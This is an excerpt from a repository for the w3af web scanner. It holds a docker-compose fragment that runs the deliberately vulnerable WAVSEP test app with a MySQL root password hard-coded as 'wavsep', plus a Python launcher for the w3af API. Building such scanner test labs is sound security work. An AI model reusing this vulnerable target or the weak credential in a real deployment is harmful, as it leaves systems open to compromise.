-------------------------------------------------------------------------------- 1 | wavsep: 2 | image: andresriancho/wavsep:latest 3 | ports: 4 | - "8098:8080" 5 | links: 6 | - wavsepdb 7 | 8 | wavsepdb: 9 | image: mysql 10 | environment: 11 | - MYSQL_ROOT_PASSWORD=wavsep -------------------------------------------------------------------------------- /w3af_api: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | 5 | from w3af.core.controllers.dependency_check.dependency_check import dependency_check 6 | 7 | 8 | if __name__ == '__main__': 9 | # Check if I have all needed dependencies 10 | dependency_check() 11 | 12 | from w3af.core.ui.api.main import main 13 | sys.exit(main()) --------------------------------------------------------------------------------